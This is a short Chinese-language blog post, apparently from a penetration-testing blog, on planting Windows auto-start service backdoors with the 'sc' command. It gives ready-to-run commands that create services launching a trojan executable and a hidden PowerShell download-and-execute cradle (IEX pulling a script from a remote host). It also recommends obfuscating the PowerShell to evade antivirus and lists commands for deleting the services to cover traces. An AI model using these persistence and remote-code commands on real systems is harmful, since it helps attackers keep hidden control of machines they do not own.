后门自启动sc
ssooking Lv5
  2019-12-20 17:19:00 2019-12-20 17:19    

SC命令

sc是Windows用于管理服务的命令,可以用于创建自启动服务后门。

自启动木马服务

注意binpath= xxx,等号后面有个空格,不然创建不成功

1
2
3
4
sc create "server power" binpath= "C:\Users\Administrator\AppData\Local\Temp\artifact.exe"
sc description "server power" "description"
sc config "server power" start= auto
net start "server power"

自启动powershell

1
2
3
4
sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1:801/a'))\""
sc description "server power" "description"
sc config "server power" start= auto
net start "server power"

可以先对powershell命令进行混淆免杀。

痕迹清理

1
2
net start "name"    启动服务
sc delete “name"    删除服务
  • Post title:后门自启动sc
  • Post author:ssooking
  • Create time:2019-12-20 17:19:00
  • Post link:https://ssooking.github.io/2019/12/后门自启动sc/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.